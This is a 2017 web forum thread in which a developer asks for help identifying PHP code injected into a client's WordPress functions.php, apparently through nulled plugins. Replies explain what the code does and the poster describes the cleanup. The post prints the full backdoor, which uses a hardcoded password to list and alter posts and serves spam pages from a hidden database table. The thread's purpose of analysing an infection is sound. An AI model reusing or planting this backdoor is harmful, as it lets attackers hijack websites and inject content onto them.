|
Author |
Message |
Jayy |
This post is not being displayed .
|
Jayy Mr. Ponzi
Joined: 08 Jun 2009 Karma :
|
Posted: 23:56 - 17 May 2017 Post subject: Any coders : PHP / mySQL - Hacked file help |
|
|
Well, I found some code inside a functions.php file of a Wordpress install. Client had told me he found "free premium plugins" and installed them... I thought, oh no, what have you done?
Any ideas what this does?
As far as I can work out, some kind of password sniffer?
Code: | <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '24daf8bf7eb6d45d9aa91bf1979b414a'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
{
$data['code'] = $_[1];
}
print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
}
break;
case 'set_id_links';
if (isset($_REQUEST['data']))
{
$data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
$post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';
if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
{
print "true";
}
}
break;
case 'create_page';
if (isset($_REQUEST['remove_page']))
{
if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
{
print "true";
}
}
elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
{
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
{
print "true";
}
}
break;
default: print "ERROR_WP_ACTION WP_URL_CD";
}
die("");
}
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
$data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
if ($data -> full_content)
{
print stripslashes($data -> content);
}
else
{
print '<!DOCTYPE html>';
print '<html ';
language_attributes();
print ' class="no-js">';
print '<head>';
print '<title>'.stripslashes($data -> title).'</title>';
print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
print '<meta name="robots" content="index, follow" />';
print '<meta charset="';
bloginfo( 'charset' );
print '" />';
print '<meta name="viewport" content="width=device-width">';
print '<link rel="profile" href="http://gmpg.org/xfn/11">';
print '<link rel="pingback" href="';
bloginfo( 'pingback_url' );
print '">';
wp_head();
print '</head>';
print '<body>';
print '<div id="content" class="site-content">';
print stripslashes($data -> content);
get_search_form();
get_sidebar();
get_footer();
}
exit;
}
?><?php |
|
|
Back to top |
|
You must be logged in to rate posts |
|
|
ScaredyCat |
This post is not being displayed .
|
ScaredyCat World Chat Champion
Joined: 19 May 2012 Karma :
|
|
Back to top |
|
You must be logged in to rate posts |
|
|
Kickstart |
This post is not being displayed .
|
Kickstart The Oracle
Joined: 04 Feb 2002 Karma :
|
Posted: 00:25 - 18 May 2017 Post subject: |
|
|
Hi
Yep, allowing some posts to be modified by a user with a specific password. Also the ability to list out some posts (probably to make it easier to screw around with them).
Note that once used it will likely screw up the details on the post table, and this might already have happened.
Amusing that a hacky type script is using mysql_escape_string
All the best
Katy ____________________ Traxpics, track day and racing photographs - Bimota Forum - Bike performance / thrust graphs for choosing gearing |
|
Back to top |
|
You must be logged in to rate posts |
|
|
Jayy |
This post is not being displayed .
|
Jayy Mr. Ponzi
Joined: 08 Jun 2009 Karma :
|
Posted: 13:17 - 18 May 2017 Post subject: |
|
|
Scenario was : Client had a guy "doing website stuff" for him but had messaged me to remove all his access as he didn't trust this guy.
I start changing all passwords on hosting, Wordpress, emails, etc etc.
Then he asks about is there a way to get login notifications, so I enabled them via Wordfence.
Wordfence flagged the file as being found 20 hrs ago when I started looking in to it.
Compared the functions.php file with a backup I had from 6 months ago of his site and saw the added code I pasted up there.
From doing my own research and following them links ScaredyCat, I'm not sure what damage this has done.
I don't see the class.wp.php file, nor do I see any of those other files they reference but I did see the _datalist table in the database (nothing in it).
Wordfence detects no core files changed, so I don't see the point in replacing all them.
All plugins are up to date and Wordpress is. All passwords changed and backups taken.
Will keep an eye on it, client is reluctant to want to spend money on having it fixed properly (don't you just love them?).
Client is the one who installed the premium version of Yoast SEO.... which he downloaded off a nulled site
I actually see nulled plugins installed on sites quite frequently these days, I don't know whether it's some office person who doesn't really understand the gravity of what they're doing or some dev who also doesn't understand / wants to save a couple bucks :/ |
|
Back to top |
|
You must be logged in to rate posts |
|
|
ScaredyCat |
This post is not being displayed .
|
ScaredyCat World Chat Champion
Joined: 19 May 2012 Karma :
|
|
Back to top |
|
You must be logged in to rate posts |
|
|
Kickstart |
This post is not being displayed .
|
Kickstart The Oracle
Joined: 04 Feb 2002 Karma :
|
|
Back to top |
|
You must be logged in to rate posts |
|
|
Jayy |
This post is not being displayed .
|
Jayy Mr. Ponzi
Joined: 08 Jun 2009 Karma :
|
|
Back to top |
|
You must be logged in to rate posts |
|
|
Old Thread Alert!
The last post was made 6 years, 316 days ago. Instead of replying here, would creating a new thread be more useful? |
|
|
|